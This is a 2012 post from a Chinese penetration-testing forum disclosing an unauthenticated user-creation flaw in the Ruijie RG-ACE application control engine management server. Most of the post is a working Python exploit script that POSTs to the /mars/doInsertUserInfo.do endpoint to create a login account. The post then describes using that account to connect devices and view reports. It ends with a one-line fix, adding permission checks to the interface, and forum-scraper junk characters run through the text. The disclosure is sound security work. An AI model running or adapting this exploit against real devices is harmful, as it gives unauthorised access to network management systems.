找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 锐捷应用控制引擎管理服务器可以增加用户
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2073|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)$ H# c- g' v4 p" D; {. R

1 }' V8 \0 U# V2 Z  [( F6 Z; F8 U; I  a% y: w% d* @- E0 d
测试的具体版本是
3 u! L% l. q+ y- X+ R& b  S% _产品名称: 锐捷应用控制引擎1 w% n6 q& g9 @7 [
版本号: 3.1.36.001 TC
  E7 s7 j" D% g" T2 @! g编译时间: 201104291730
' N) m) H0 v, h) J* z 6 i1 K1 p& V, Z+ x1 m

0 }. H& E6 n1 n" t漏洞证明:
6 D# n, Q2 V: u1 _" u- [
" f! M- i3 |! ~4 \- s0 w1 V' b
+ P' n8 H- m, H% U) h; {
& j3 U  z. Z0 `- x, b3 @, k8 g( f) P( L# U$ X
6 A! W; [1 ~! q3 H% k

/ F# l1 b7 ^$ C. O8 P' Z  P3 }执行脚本) B$ V7 a* H& Q+ h; {. f
#! /usr/bin/env python
( X. m! d/ H; {7 q+ v9 i5 K# @4 `#coding=gbk
% Z( p6 p, |  V* ]# C  E#RG-ACE管理服务器 V3.1.36.001
8 v" ^2 I5 A4 {! `4 W* [import urllib2, urllib,cookielib
  p( ~: _7 N  t6 Y& ~& W  Vurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP9 [  o1 r7 c  ?% l! R
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
3 m8 m# c7 z' G4 h* M- l8 Qopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]) O' d/ |/ C& y# }
post=(("event","userManager.doInsertUserInfo"),1 O& R! y! z, M( w7 Z/ m# X+ Y. n
("useractionname","addButtonValue"),1 p9 u- w9 r0 c5 E  E6 B
("useropermanager","userManager"),! t( B! ?" W$ b4 ?$ |: \! S, `
("userName","t"), #######账号自己加; r# ~4 @1 d) ^3 Q
("pwd","aaaaaa"),######密码自己加
7 [$ d9 n/ r6 d( E: o& X( v- ]("trueName","ad"),5 _1 R# p; C" w2 N" F
("email",""),0 E2 i1 O$ \$ L- {* ~& D2 [1 Z( F
("mobilePhone",""),
$ j5 E6 z: a1 E. `6 a4 ?& O4 \("officePhone",""),
* ]+ }9 c& ]- V2 t3 l) [("addr",""),' E0 a8 a, P. F% p* `
("submit","确定")): ^6 \3 U) V0 r
urllib2.install_opener(opener), {% a; L4 E5 L4 U
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
5 \& ?- N1 R  [4 \print "Done"8 d1 J8 z, e0 D+ T' h  a) P
1 L" D; |) T! t; G# O  \
登录,连接设备7 D# d: Y$ Q& g
2 Z& e' _% x, y- I" j% D7 u5 n
4 U5 U; [0 ^. e1 c% n6 [  U# |1 j
& W: `# j, b2 ^( X8 x
6 V. u3 S+ @8 d& m! g- Z( @
: E1 r: Q' z$ F4 V! ]; X/ r3 A5 K
默认的管理员admin权限更大点
) t& P: s) v' G: s3 Z) p3 p+ P0 v! d5 ~* Q% O5 ?4 n* W

$ P: B5 S/ ^3 w) y7 x$ D$ W
" b4 R* w8 C5 E' s+ ?. s& G! [5 P: z
( z- U9 T) v1 Y3 L" t, F" p
5 D2 m9 P: p' P修复方案:" {5 K8 t/ a( j* P3 d# `% p% f
加强对接口的权限验证- `# W: Y' Q, T7 P1 \! ^7 U* j$ r

; K& M7 G2 s( L: r# \. _
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表